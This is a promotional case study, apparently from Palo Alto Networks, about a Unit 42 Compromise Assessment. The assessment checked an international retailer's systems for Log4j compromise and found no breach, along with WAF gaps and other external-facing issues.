An international retailer relies on Unit 42 to identify its Log4j exposure and risk

For an international retailer, maintaining world-class cybersecurity is an essential part of providing exceptional service to its customers. To achieve this goal, it invested in Palo Alto Networks products to help automate its Security Operations Center, and contracted with Palo Alto Networks Unit 42 to provide incident response services.

Through this relationship, the retailer’s security team grew to trust Unit 42’s expertise in rapidly investigating and mitigating security threats.

When the Apache Software Foundation published an alert on the Log4j vulnerability, the security team worked quickly to lock down its systems. It applied the appropriate patches and investigated whether systems had been compromised.

For increased assurance around the security of its data, the retailer asked Unit 42 to perform an in-depth Compromise Assessment of its digital estate, focused on the Log4j vulnerability.

The Log4j vulnerability, identified in early December 2021, enabled a threat actor to execute remote code on targeted systems. Log4j is used by millions of Java applications, resulting in an enormous attack surface. The Log4j vulnerability warranted the highest possible rating on the Common Vulnerability Scoring System (CVSS), a method used to assess a qualitative measure of severity.

After patching its systems, the retailer needed to provide its board, insurers, and other stakeholders an authoritative assessment of whether its systems and data had been compromised. It sought to determine what, if any, further steps were required to secure its network, and whether it needed to notify anyone whose personally identifiable information (PII) might have been compromised.

This investigation needed to be performed by recognized security experts who could provide the organization a comprehensive evaluation of its environment.

The retailer needed to provide its board, insurers, and other stakeholders an authoritative assessment of whether its systems and data had been compromised.

The client needed to validate that its efforts to patch the Log4j vulnerability were successful, and that none of its systems had been compromised.

Its security team and Unit 42 worked together to define the scope of the investigation, and identified five major objectives:

• Identify signs that threat actors had accessed or transferred data out of the client’s systems, especially PII, by looking for breaches in its endpoint detection and response (EDR) system.
• Examine the client’s security information and event management (SIEM) system to identify known indicators of compromise (IOCs) associated with the Log4j vulnerability.
• Identify the internal and external attack surfaces that could be used to exploit the Log4j vulnerability for servers deployed on-premises and in the cloud.
• Review configuration of client’s web application firewalls (WAFs) to identify coverage for HTTP payloads known to exploit the Log4j vulnerability.
• Measure the security of six designated external-facing sites by doing a limited web application security assessment focused on attempts to exploit known susceptibilities to the Log4j vulnerability.

Unit 42 performed a Compromise Assessment on the client’s digital estate. Unit 42’s extensive experience with incident response and threat intelligence enables it to provide security assessments informed by the general threat landscape, as well as specific threats like the Log4j vulnerability.

Using this threat-informed approach, Unit 42 can identify specific indicators of compromise, covering various vectors threat actors may use in an attack. It uses a precise, proprietary methodology to perform assessments that provide comprehensive information about a client’s environment and security posture by examining internal and external attack surfaces, threat hunting, and other techniques.

The Unit 42 assessment identified significant security gaps in the client’s environment, including thirteen critical issues in external facing assets.

This assessment focused on the Log4j vulnerability and extended to additional potentially impacted areas.

External attack surface analysis

Using Cortex Xpanse™, Unit 42 performed a comprehensive analysis of the client’s vulnerability to attack by mapping the attack surface of approximately 4,000 domains and 120 public IP blocks. It focused on specific susceptibility to the Log4j vulnerability while also looking for other vulnerabilities in the client’s applications, certificates, and infrastructure.

While no indicators attributed to the Log4j vulnerability were identified, more than 2,000 issues were identified in other areas. Most of these related to TLS certificate problems, but the assessment also found exposed VPN devices, open Remote Desktop Protocol (RDP) ports, and application servers running vulnerable versions of software.

Threat hunting

Using Cortex XDR® and the client’s existing security tools to review forensic data for any ongoing or historical indicators of compromise, Unit 42 looked for evidence of unauthorized access to the client’s data. Investigators also used a search query to identify assets that were susceptible to the three known common vulnerabilities and exposures (CVEs) associated with the Log4j vulnerability. This found more than 100 assets that could have been susceptible, if the client’s security team had not already patched the vulnerability.

Unit 42 then performed further in-depth analysis on those assets, to determine whether threat actors had performed reconnaissance, executed malicious code, installed persistent code, engaged in command and control activities, accessed credentials or data, or taken anti forensic measures.

After extensive analysis, Unit 42 found no evidence of malicious activity or unauthorized access to sensitive data in the client’s network.

External penetration testing

Unit 42 also performed penetration testing on six of the client’s external-facing websites. Based on its threat intelligence regarding Log4j vulnerability payloads, Unit 42 created payloads to use in tests against these sites.

In addition, Unit 42 reviewed client Content Delivery Network (CDN) configurations for approximately 200 sites, endpoint data for approximately 55,000 assets, and client SIEM log data for approximately 80,000 assets on 41 data sources.

Unit 42’s investigation assured the client there had been no unauthorized access to its network or data due to the Log4j vulnerability. Nor had there been any malicious activity in the client’s environment. This result meant it wasn’t necessary for the client to provide legally required disclosures, which could have been costly and harmed its reputation.

The Unit 42 assessment did, however, identify significant security gaps in the client’s environment. It found thirteen critical issues in external-facing assets. It also discovered that more than ten websites lacked Web Application Firewall (WAF) policies and more than twenty had WAF rules that were more than a year out of date. Identifying these vulnerabilities enabled the client to strengthen its security posture.

Unit 42’s investigation assured the client there had been no unauthorized access to its network or data due to the Log4j vulnerability.

After completing the assessment, Unit 42 created an executive summary for the client’s board and C-Suite leadership and an in-depth technical report for the security team. Both the security team and Unit 42 received accolades for their collaborative work.

This engagement strengthened the client’s relationship with Unit 42 and its confidence in Unit 42’s incident response capabilities. It also demonstrated that the client’s security team had effectively patched the Log4j vulnerability across the organization. Through this Compromise Assessment, Unit 42 validated the skills and effectiveness of the client’s security team and helped the client significantly improve its risk posture and visibility into its digital estate.

The Log4j vulnerability was as serious a potential exploit as can be. While the retailer moved quickly to secure its environment, the potential for damage to its business was substantial, driving it to bring in outside experts. A successful exploit in its environment could have also seriously impacted its customers.

By engaging Unit 42 to perform a Compromise Assessment, the client gained peace of mind knowing its environment and systems were secure and hadn’t been breached. The assessment also provided important information about other vulnerable areas of its infrastructure, allowing the client to meaningfully improve its security posture. This not only strengthened the retailer’s business and systems, but also improved its ability to protect and serve its customers.

Find out more about how a Unit 42 Compromise Assessment can improve your organization’s security posture. Additional information is here.